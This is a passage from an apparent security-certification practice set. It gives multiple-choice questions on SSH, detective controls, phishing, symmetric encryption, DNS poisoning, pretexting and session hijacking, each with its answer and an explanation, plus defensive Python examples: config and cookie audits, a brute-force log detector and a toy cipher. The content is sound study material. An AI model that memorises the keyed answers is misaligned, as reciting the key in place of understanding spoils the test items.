OTPs are commonly generated and delivered through a variety of mechanisms. Hardware tokens can display the OTP on a small device, while software-based solutions, such as mobile authenticator apps, generate codes using time-based or event-based algorithms. In some cases, OTPs are sent via SMS or email, though these channels carry their own risks, such as interception, SIM swapping, or compromise of the mailbox. OTPs are often used as a component of multi-factor authentication (MFA), combining them with passwords or biometrics to create multiple layers of verification. This combination significantly reduces the likelihood of successful attacks, including phishing, brute-force attempts, and credential-stuffing attacks, by ensuring that even if one factor is compromised, the attacker cannot gain access without the OTP.

The underlying mechanisms are standardized: HOTP (RFC 4226) computes an HMAC over a shared secret and an incrementing counter and truncates the result to a short decimal code, and TOTP (RFC 6238) replaces the counter with the number of time steps since the Unix epoch, so generator and server must keep their clocks roughly synchronized; challenge-response tokens instead derive the code from a server-supplied nonce. The shared secret is the sensitive part: it must be provisioned over a protected channel (an enrolment page or QR code served over TLS) and stored encrypted on the server, because anyone holding it can generate valid codes. Organizations frequently use OTPs to secure remote access systems, financial transactions, enterprise applications, and sensitive corporate systems. Effective implementation requires secure transmission of OTPs, monitoring for suspicious activity, and integration with account lockout policies, since a six-digit code can be guessed online if unlimited attempts are allowed. OTPs also help organizations meet regulatory and industry requirements in sectors such as finance, healthcare, and government, providing a practical method for securing digital access.

Question 34

Which protocol provides secure remote command-line access to devices over an unsecured network?

( A )  Telnet
( B )  Secure Shell (SSH)
( C )  FTP
( D )  HTTP

Answer: B

Explanation:

Secure Shell (SSH) is a widely used cryptographic protocol that enables secure remote access and management of computers, servers, and network devices over unsecured networks. Unlike legacy protocols such as Telnet, which transmit login credentials and data in plaintext, SSH encrypts all communication, protecting sensitive information from interception, eavesdropping, session hijacking, and data tampering. While other protocols like FTP and HTTP serve specific functions—FTP for file transfers and HTTP for web-based communication—they do not provide inherent encryption, leaving transmitted data vulnerable. SSH ensures both authentication and confidentiality, using methods such as password-based authentication, public key cryptography, or multi-factor authentication to verify user identities securely.

In addition to secure remote command-line access, SSH supports advanced features such as secure tunneling, port forwarding, and file transfers via SFTP, which encrypts data in transit to prevent unauthorized access. Network administrators rely on SSH to perform critical operations, including server management, configuration of routers and switches, firewall administration, and execution of scripts, all while maintaining the integrity and confidentiality of the session. SSH also enables automation of secure tasks, including backups and deployment processes, enhancing operational efficiency while reducing security risks associated with manual intervention.

To maintain a robust security posture, organizations implement best practices such as disabling direct root login, enforcing strong cryptographic key pairs, restricting access through firewalls, and continuously monitoring SSH logs for unusual activity. Regular SSH key rotation, multi-factor authentication enforcement, and limiting connections to known hosts further mitigate the risks of credential compromise and unauthorized access. By combining these controls with proper network segmentation and monitoring, organizations can prevent attacks such as brute-force attempts, unauthorized remote access, and malware propagation via compromised accounts.
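The hardening list above maps onto a handful of `sshd_config` directives, and the mistake most often seen in the field is a later "correct" line that sshd silently ignores because an earlier line already set the keyword. The following is an added example, not code from the original page or from OpenSSH: a small audit that parses a config with sshd's own rules (comments, `Key value` or `Key=value`, case-insensitive keywords, first occurrence wins, `Match` blocks conditional) and flags weak settings. Both sample configs are constructed for the example; the defaults assumed when a directive is absent are those of a current OpenSSH release.

```python
import re

# Constructed sample configs (not from any real host). The weak one repeats
# PasswordAuthentication: sshd keeps the FIRST value, so the later "no" is dead.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PasswordAuthentication no
MaxAuthTries 10
X11Forwarding no
"""

HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
X11Forwarding no
LogLevel VERBOSE
Match User backup
    PasswordAuthentication yes
"""


def parse_sshd_config(text: str) -> dict:
    """Effective global directives as lower-cased keyword -> value, using sshd semantics:
    '#' starts a comment, 'Key value' or 'Key=value', keywords are case-insensitive and the
    first occurrence wins. Directives under a Match block apply only to matching
    connections and are left out of the global view."""
    effective = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"([A-Za-z0-9]+)\s*[=\s]\s*(.+)", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        effective.setdefault(key, value)
    return effective


def audit_sshd_config(text: str) -> list:
    """Flag directives that weaken remote access. Assumed defaults are OpenSSH's."""
    cfg = parse_sshd_config(text)
    get = lambda key, default: cfg.get(key, default).lower()
    findings = []
    if get("permitrootlogin", "prohibit-password") not in ("no", "prohibit-password"):
        findings.append("PermitRootLogin allows root password login; set it to 'no'")
    if get("passwordauthentication", "yes") != "no":
        findings.append("PasswordAuthentication is on; set 'no' and require keys")
    if get("pubkeyauthentication", "yes") != "yes":
        findings.append("PubkeyAuthentication is off; key-based login is unavailable")
    if get("permitemptypasswords", "no") != "no":
        findings.append("PermitEmptyPasswords is on")
    tries = get("maxauthtries", "6")
    if not tries.isdigit() or int(tries) > 4:
        findings.append(f"MaxAuthTries is {tries}; lower it to 3 or 4 to slow brute force")
    if get("x11forwarding", "no") != "no":
        findings.append("X11Forwarding is on; disable unless required")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_sshd_config(cfg) or ["no findings"])
```

Run it against a live host with `audit_sshd_config(open("/etc/ssh/sshd_config").read())`; for the authoritative view after includes and Match evaluation, compare with `sshd -T`, which prints the effective configuration.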

SSH has become a foundational element of enterprise security strategies, particularly in environments that require secure remote administration, sensitive data handling, and automated processes. A thorough understanding of SSH’s cryptographic mechanisms, combined with strict access controls and monitoring, allows organizations to maintain secure remote operations while minimizing exposure to cybersecurity threats. Properly implemented, SSH ensures that sensitive administrative tasks are executed securely, reinforcing both system integrity and organizational trust.

Question 35

Which type of security control aims to detect and respond to threats after they occur?

( A )  Preventive control
( B )  Detective control
( C )  Corrective control
( D )  Deterrent control

Answer: B

Explanation:

Detective controls are security measures implemented to identify and alert organizations to unauthorized activities, security breaches, or other suspicious events after they occur. Unlike preventive controls, which are designed to stop incidents before they happen, detective controls focus on monitoring, observing, and detecting activities that could indicate a security compromise. Common examples of detective controls include intrusion detection systems (IDS), log monitoring and analysis, audit trails, and continuous security event monitoring. While corrective controls aim to remediate the effects of an incident and deterrent controls are intended to discourage malicious behavior through visible warnings or policies, detective controls provide organizations with crucial visibility into ongoing or past security events, enabling timely investigation and response.

Detective controls play a vital role in incident response processes. By collecting and analyzing data from networks, systems, and applications, these controls help security teams identify attack patterns, compromised assets, and exploited vulnerabilities. This information is essential for containing breaches, minimizing damage, and implementing appropriate corrective actions. Modern detective controls often leverage automated technologies such as Security Information and Event Management (SIEM) systems, anomaly detection tools, and behavioral analytics to monitor large volumes of activity in real time. These systems can correlate events across multiple sources, detect unusual behavior, and generate alerts that guide security teams to potential threats. Human oversight remains critical, however, to interpret complex signals, investigate anomalies, and determine appropriate responses.

Maintaining effective detective controls requires continuous monitoring, regular updates of detection signatures, integration of threat intelligence, and periodic audits to ensure coverage across the organization’s infrastructure. These controls also support compliance with regulatory frameworks by documenting monitoring efforts and demonstrating timely response to incidents. While they do not prevent attacks directly, detective controls are essential for reducing the overall impact of security incidents, improving situational awareness, and informing improvements to preventive measures. When integrated into a layered security strategy alongside preventive and corrective controls, detective mechanisms significantly enhance an organization’s ability to manage threats, maintain operational resilience, and protect critical information assets.
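A detective control in its simplest concrete form is a correlation rule run over log lines. The following is an added example, not code from the original page or from any SIEM product: a sliding-window rule over sshd authentication events that raises a brute-force alert when one source accumulates five failures within 60 seconds, and a higher-severity alert when that same source then logs in successfully while its failures are still inside the window, the pattern an analyst should treat as a probable compromise rather than noise. The log lines are constructed for the example (documentation address ranges, fictional host), the year is assumed because syslog timestamps omit it, and the thresholds are parameters to tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines in syslog format (fictional host, documentation IP ranges).
SAMPLE_LOG = """\
Mar 12 10:01:02 bastion sshd[4120]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar 12 10:01:05 bastion sshd[4121]: Failed password for root from 203.0.113.5 port 51236 ssh2
Mar 12 10:01:09 bastion sshd[4122]: Failed password for invalid user oracle from 203.0.113.5 port 51238 ssh2
Mar 12 10:01:12 bastion sshd[4123]: Failed password for deploy from 198.51.100.7 port 40022 ssh2
Mar 12 10:01:14 bastion sshd[4124]: Failed password for root from 203.0.113.5 port 51240 ssh2
Mar 12 10:01:18 bastion sshd[4125]: Accepted publickey for deploy from 198.51.100.7 port 40024 ssh2
Mar 12 10:01:20 bastion sshd[4126]: Failed password for deploy from 203.0.113.5 port 51242 ssh2
Mar 12 10:01:27 bastion sshd[4127]: Failed password for deploy from 203.0.113.5 port 51244 ssh2
Mar 12 10:01:41 bastion sshd[4128]: Accepted password for deploy from 203.0.113.5 port 51250 ssh2
Mar 12 10:05:00 bastion sshd[4130]: Failed password for invalid user test from 192.0.2.9 port 33001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line: str, year: int = 2024):
    """Extract timestamp, outcome, user and source IP; syslog carries no year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"),
        "result": m["result"],
        "user": m["user"],
        "ip": m["ip"],
    }


def detect_ssh_bruteforce(lines, threshold: int = 5, window_s: int = 60) -> list:
    """Sliding-window correlation: >= threshold failures from one source inside window_s
    raises brute_force (once per source); an Accepted login from that source while its
    failures are still inside the window raises success_after_bruteforce."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    already_flagged = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue  # unrelated or unparseable line
        q = recent[ev["ip"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()  # expire failures that fell out of the window
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in already_flagged:
                already_flagged.add(ev["ip"])
                alerts.append({"ip": ev["ip"], "rule": "brute_force",
                               "failures": len(q), "at": ev["ts"].isoformat()})
        elif len(q) >= threshold:
            alerts.append({"ip": ev["ip"], "rule": "success_after_bruteforce",
                           "user": ev["user"], "at": ev["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
```

On the sample, 198.51.100.7 (one typo, then a key login) stays quiet, while 203.0.113.5 trips both rules; the second alert is the one that should page someone, because the attacker is now inside with the `deploy` account.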

Question 36

Which attack attempts to trick users into divulging sensitive information through fraudulent communication?

( A )  Phishing
( B )  SQL injection
( C )  Denial-of-service
( D )  Man-in-the-middle

Answer: A

Explanation:

Phishing is a type of social engineering attack in which cybercriminals manipulate users into disclosing sensitive information, such as login credentials, financial details, or personal data. Attackers typically use deceptive communication channels, including emails, text messages, instant messaging, or counterfeit websites that closely mimic legitimate services. Unlike purely technical attacks, phishing relies heavily on human psychology, exploiting trust, urgency, curiosity, or fear to convince targets to act without careful scrutiny. While other attacks such as SQL injection target databases, denial-of-service attacks disrupt system availability, and man-in-the-middle attacks intercept communications, phishing focuses on tricking users into voluntarily providing valuable information.

There are several variations of phishing attacks, each tailored to different objectives and targets. Spear-phishing, for example, is highly targeted and directed at specific individuals or organizations, often leveraging personal or professional details to increase credibility. Whaling attacks specifically aim at high-level executives or key decision-makers, seeking access to critical business systems or confidential information. Clone phishing involves creating a nearly identical copy of a legitimate message previously sent to the target, substituting malicious links or attachments. These variations demonstrate the adaptability of phishing tactics, which can combine technical deception with psychological manipulation to achieve their goals.

Organizations can take multiple measures to prevent phishing attacks and reduce associated risks. User education and awareness training are critical, teaching individuals to recognize suspicious messages, verify sources, and avoid unsafe actions. Technical solutions, such as email filtering, anti-phishing software, multi-factor authentication, and web content inspection, further mitigate exposure. Monitoring for anomalous activity, such as unusual login attempts or suspicious domains, helps detect potential compromises early. Incident response procedures are also essential, ensuring that any successful phishing attempts are contained quickly and remediated effectively.

Question 37

Which encryption method uses the same key for both encryption and decryption of data?

( A )  Symmetric encryption
( B )  Asymmetric encryption
( C )  Hashing
( D )  Digital signature

Answer: A

Explanation:

Symmetric encryption is a cryptographic method that uses a single key for both encrypting and decrypting data, making it a highly efficient and fast way to protect information. The sender uses the key to convert plaintext into ciphertext, and the recipient uses that exact key to reverse the process and recover the original data. Because only one key is involved, symmetric encryption is well suited to encrypting large volumes of data and is the workhorse of secure file storage, data transmission, and communication protocols, with the Advanced Encryption Standard (AES) the most widely used symmetric algorithm. Its speed and low computational overhead make it ideal for scenarios where performance is a critical concern.

However, the effectiveness of symmetric encryption relies heavily on secure key distribution. If the key is intercepted or exposed, the confidentiality of the data is compromised, as anyone with access to the key can decrypt the information. To mitigate this risk, organizations must implement robust key management strategies, which include securely generating, distributing, storing, rotating, and eventually retiring keys. Access to encryption keys should be tightly controlled and limited to authorized personnel, with regular audits and monitoring to detect any unauthorized use.

In contrast to symmetric encryption, asymmetric encryption uses a pair of keys—a public key for encryption and a private key for decryption—eliminating the need to share a single secret key. Hashing, another cryptographic technique, does not encrypt data but produces a fixed-size digest to verify data integrity. Digital signatures often combine hashing with asymmetric encryption to ensure authenticity and non-repudiation. Symmetric encryption is often implemented alongside these methods in layered cryptographic systems to provide comprehensive security.

The security of symmetric algorithms is assessed based on their resistance to attacks, including brute-force attempts, as well as their computational efficiency and overall cryptographic strength. When combined with proper key management, secure protocols, and complementary cryptographic measures, symmetric encryption provides a reliable means of maintaining data confidentiality. Understanding the principles of symmetric encryption, including key lifecycle management and secure implementation practices, is essential for organizations to protect sensitive information, maintain trust, and comply with data protection regulations in enterprise environments.
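To make the "same key both ways" property and its failure modes concrete, the following is an added example, not code from the original page or from any library: a small authenticated symmetric scheme built only from the Python standard library so it runs offline. It is not AES; it derives separate encryption and MAC keys from one shared secret, generates a counter-mode keystream from HMAC-SHA256 (a PRF, so this is a sound if unoptimised stream cipher), and applies encrypt-then-MAC. In production you would use AES-GCM or ChaCha20-Poly1305 from a vetted library, but the lessons are the same: the key must already be shared, a wrong key or a flipped byte is rejected before any plaintext is released, and reusing a nonce under one key leaks the XOR of the two plaintexts. The key, nonce and message values are constructed for the example.

```python
import hashlib
import hmac
import os

NONCE_LEN, TAG_LEN = 16, 32


def _subkeys(key: bytes):
    """Derive independent encryption and MAC keys from one shared secret (HKDF-style labels)."""
    k_enc = hmac.new(key, b"enc", hashlib.sha256).digest()
    k_mac = hmac.new(key, b"mac", hashlib.sha256).digest()
    return k_enc, k_mac


def _keystream(k_enc: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream: block i = HMAC-SHA256(k_enc, nonce || i)."""
    out = bytearray()
    for i in range((length + 31) // 32):
        out += hmac.new(k_enc, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, plaintext: bytes, nonce: bytes = None) -> bytes:
    """Return nonce || ciphertext || tag. The nonce must never repeat under the same key."""
    nonce = os.urandom(NONCE_LEN) if nonce is None else nonce
    k_enc, k_mac = _subkeys(key)
    ct = xor_bytes(plaintext, _keystream(k_enc, nonce, len(plaintext)))
    tag = hmac.new(k_mac, nonce + ct, hashlib.sha256).digest()  # encrypt-then-MAC
    return nonce + ct + tag


def decrypt(key: bytes, blob: bytes) -> bytes:
    """Same key as encrypt(); the tag is verified before the ciphertext is touched."""
    if len(blob) < NONCE_LEN + TAG_LEN:
        raise ValueError("truncated message")
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    k_enc, k_mac = _subkeys(key)
    expected = hmac.new(k_mac, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("authentication failed: wrong key or tampered ciphertext")
    return xor_bytes(ct, _keystream(k_enc, nonce, len(ct)))


def opens_with(key: bytes, blob: bytes) -> bool:
    """True if blob authenticates and decrypts under key, False otherwise."""
    try:
        decrypt(key, blob)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    key = os.urandom(32)  # the one secret both parties must already share
    msg = b"wire transfer 4200.00 to account 1234"
    blob = encrypt(key, msg)
    print("same key round-trips:", decrypt(key, blob) == msg)
    print("other key opens it:", opens_with(os.urandom(32), blob))
    tampered = bytearray(blob)
    tampered[NONCE_LEN] ^= 0x01  # flip one ciphertext bit
    print("tampered blob opens:", opens_with(key, bytes(tampered)))
    # Nonce reuse: two ciphertexts under one (key, nonce) XOR to the XOR of the plaintexts.
    n = os.urandom(NONCE_LEN)
    c1 = encrypt(key, b"attack at dawn", n)[NONCE_LEN:-TAG_LEN]
    c2 = encrypt(key, b"attack at dusk", n)[NONCE_LEN:-TAG_LEN]
    print("nonce reuse leaks plaintext xor:", xor_bytes(c1, c2))
```

The contrast with hashing drawn in the explanation is visible here too: `hashlib.sha256(msg)` needs no key and cannot be reversed, whereas `decrypt` needs the same `key` that `encrypt` used, and without it yields nothing at all, not even a partial plaintext.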

Question 38

Which type of attack manipulates DNS responses to redirect users to malicious websites?

( A )  DNS poisoning
( B )  ARP spoofing
( C )  Cross-site scripting
( D )  SQL injection

Answer: A

Explanation:

DNS poisoning, also known as DNS spoofing, manipulates Domain Name System responses to redirect users to malicious websites without their knowledge. Attackers compromise DNS records, cache, or resolvers, causing legitimate domain requests to resolve to attacker-controlled IP addresses. ARP spoofing targets MAC-IP mappings, XSS injects malicious scripts into web pages, and SQL injection exploits database queries. DNS poisoning can facilitate phishing, malware delivery, and credential theft. Preventive measures include DNSSEC implementation, monitoring DNS traffic for anomalies, patching DNS servers, and restricting recursive queries. Organizations should also employ threat intelligence feeds to detect malicious domains and maintain endpoint protection. Awareness campaigns for users help prevent accidental disclosure of sensitive information. Effective mitigation requires a combination of network security controls, robust DNS configuration, logging, and proactive incident response. DNS poisoning poses severe risks to organizational security and trust because it exploits a fundamental internet infrastructure service. Proper management and layered defenses reduce exposure and enhance resilience against these attacks.

Question 39

Which type of social engineering attack involves attackers posing as technical support to gain access?

( A )  Vishing
( B )  Tailgating
( C )  Pretexting
( D )  Pharming

Answer: C

Explanation:

Pretexting is a social engineering attack where attackers create a fabricated scenario to gain trust and manipulate individuals into revealing sensitive information or performing unauthorized actions. Posing as technical support or authority figures is a common tactic. Vishing uses phone calls to deceive victims, tailgating involves physical access by following authorized personnel, and pharming redirects users to fraudulent websites. Pretexting relies on psychological manipulation, credibility, and perceived legitimacy. Attackers often research targets to craft convincing narratives. Preventive measures include user awareness training, verification protocols, and strict identity verification procedures. Organizations should encourage reporting suspicious requests and implement multi-factor authentication to reduce risk. Monitoring communications, auditing access, and maintaining clear policies further mitigate the threat. Pretexting exploits human behavior more than technical weaknesses, making education and vigilance essential in defending against these attacks. By combining procedural controls, security awareness, and technical measures, organizations reduce exposure to pretexting-based compromise.

Question 40

Which type of attack aims to hijack a user session after authentication without knowing login credentials?

( A )  Session hijacking
( B )  Brute-force attack
( C )  Phishing
( D )  SQL injection

Answer: A

Explanation:

Session hijacking occurs when an attacker gains unauthorized access to an active user session after authentication, without needing to know the login credentials. This can involve stealing session cookies, session IDs, or exploiting unsecured network protocols. Brute-force attacks attempt credential guessing, phishing relies on social engineering, and SQL injection manipulates database queries. Session hijacking undermines confidentiality and integrity, enabling attackers to impersonate legitimate users and perform unauthorized actions. Preventive measures include using secure cookies, HTTPS, session expiration, multi-factor authentication, and monitoring for abnormal activity. Organizations should implement network segmentation, intrusion detection, and secure session management practices. Attackers may exploit vulnerabilities in web applications, client systems, or network communication, emphasizing the need for comprehensive security strategies. Detecting and mitigating session hijacking requires combining preventive, detective, and corrective controls. By securing session tokens, enforcing strict session management, and educating users about phishing and social engineering risks, organizations can minimize exposure to session hijacking attacks while maintaining operational trust and compliance.
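The "secure cookies, HTTPS, session expiration" advice above comes down to a few attributes on the `Set-Cookie` header that issues the session token. The following is an added example, not code from the original page or from any web framework: a parser for `Set-Cookie` and an audit that flags the attributes whose absence turns a stolen or sniffed token into a hijacked session. Both sample headers are constructed; the 22-character minimum is an assumption that the token is base64-encoded and should carry at least 128 bits of randomness, and the 8-hour `Max-Age` ceiling is a policy choice to tune. Server-side expiry and regeneration of the session id after login are still required; a cookie attribute cannot enforce either.

```python
# Constructed sample headers for the example (not captured from a real site).
WEAK_SET_COOKIE = "SESSIONID=12345; Path=/"
HARDENED_SET_COOKIE = (
    "__Host-session=9f1Kc3QeX0bS7YxT6LwJr2aQ; Path=/; Secure; HttpOnly; "
    "SameSite=Lax; Max-Age=3600"
)


def parse_set_cookie(header: str):
    """Split a Set-Cookie header into (name, value, {attribute: value}). Attribute names
    are case-insensitive; flag attributes such as Secure and HttpOnly map to ''."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        k, _, v = part.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return name.strip(), value.strip(), attrs


def audit_session_cookie(header: str, max_age_limit: int = 8 * 3600, min_token_len: int = 22) -> list:
    """Flag attributes that make the session token easy to steal or reuse."""
    name, value, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: token is also sent over plain HTTP and can be sniffed")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: script can read the token, so XSS becomes session theft")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("SameSite not Lax/Strict: cross-site requests carry the session cookie")
    max_age = attrs.get("max-age")
    if max_age is not None and (not max_age.isdigit() or int(max_age) > max_age_limit):
        findings.append(f"Max-Age {max_age} exceeds {max_age_limit}s: long-lived tokens widen the replay window")
    if len(value) < min_token_len:
        findings.append("session id is short: likely under 128 bits of entropy, so guessable")
    if not name.startswith("__Host-"):
        findings.append("no __Host- prefix: a subdomain or plain-HTTP origin can overwrite the cookie")
    return findings


if __name__ == "__main__":
    for label, hdr in (("weak", WEAK_SET_COOKIE), ("hardened", HARDENED_SET_COOKIE)):
        print(label, audit_session_cookie(hdr) or ["no findings"])
```

The `__Host-` prefix is the attribute people most often leave out: browsers only accept such a cookie if it is set with `Secure`, from a secure origin, with `Path=/` and no `Domain`, which closes the subdomain-overwrite route to session fixation.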

 
